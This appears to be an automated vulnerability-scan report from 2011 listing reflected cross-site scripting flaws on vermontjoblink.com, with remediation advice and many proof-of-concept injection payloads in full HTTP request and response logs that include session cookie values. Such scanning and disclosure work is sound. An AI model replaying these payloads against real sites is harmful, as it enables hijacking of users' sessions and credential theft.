Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d7a"style%3d"x%3aexpression(alert(1))"0a17ee4770b was submitted in the url parameter. This input was echoed as a8d7a"style="x:expression(alert(1))"0a17ee4770b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2Fa8d7a"style%3d"x%3aexpression(alert(1))"0a17ee4770b HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:05 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="http://www.act.org/certificate/a8d7a"style="x:expression(alert(1))"0a17ee4770b" target="_blank"> ...[SNIP]...
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3251d"style%3d"x%3aexpression(alert(1))"958bb28727d was submitted in the rand parameter. This input was echoed as 3251d"style="x:expression(alert(1))"958bb28727d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ada/mn_eligibility_dsp.cfm?rand=1688523251d"style%3d"x%3aexpression(alert(1))"958bb28727d HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:07 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the BLTEXTBOXEXTRADONOTUSE1_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5253"style%3d"x%3aexpression(alert(1))"6a3bba82691 was submitted in the BLTEXTBOXEXTRADONOTUSE1_prev parameter. This input was echoed as c5253"style="x:expression(alert(1))"6a3bba82691 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:02 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:09:02'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the CFTEXTBOXEXTRADONOTUSE_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8487"style%3d"x%3aexpression(alert(1))"a92543e7b70 was submitted in the CFTEXTBOXEXTRADONOTUSE_prev parameter. This input was echoed as a8487"style="x:expression(alert(1))"a92543e7b70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:55'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the ERRORFIELDS request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6034"style%3d"x%3aexpression(alert(1))"b3d03e576d5baaa17 was submitted in the ERRORFIELDS parameter. This input was echoed as b6034"style="x:expression(alert(1))"b3d03e576d5baaa17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuseridb6034"style%3d"x%3aexpression(alert(1))"b3d03e576d5baaa17&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the FORMID_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d2b5"style%3d"x%3aexpression(alert(1))"372f5e60b41 was submitted in the FORMID_prev parameter. This input was echoed as 8d2b5"style="x:expression(alert(1))"372f5e60b41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:09:08'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the FORMNAME_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32fd"style%3d"x%3aexpression(alert(1))"645ffa01d98 was submitted in the FORMNAME_prev parameter. This input was echoed as a32fd"style="x:expression(alert(1))"645ffa01d98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:51'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the FormID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50bdc"><a>d414acd7200 was submitted in the FormID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:16 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="/ada/mn_forgotpass.cfm?securitysys=on&formid=1050bdc"><a>d414acd7200&rand=887277&choice=1"> ...[SNIP]...
The value of the FormName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbf0"style%3d"x%3aexpression(alert(1))"34e6cd92313 was submitted in the FormName parameter. This input was echoed as 2bbf0"style="x:expression(alert(1))"34e6cd92313 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:55'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the FormName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed897"style%3d"x%3aexpression(alert(1))"6af9926f561ad08f3 was submitted in the FormName parameter. This input was echoed as ed897"style="x:expression(alert(1))"6af9926f561ad08f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0ed897"style%3d"x%3aexpression(alert(1))"6af9926f561ad08f3 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
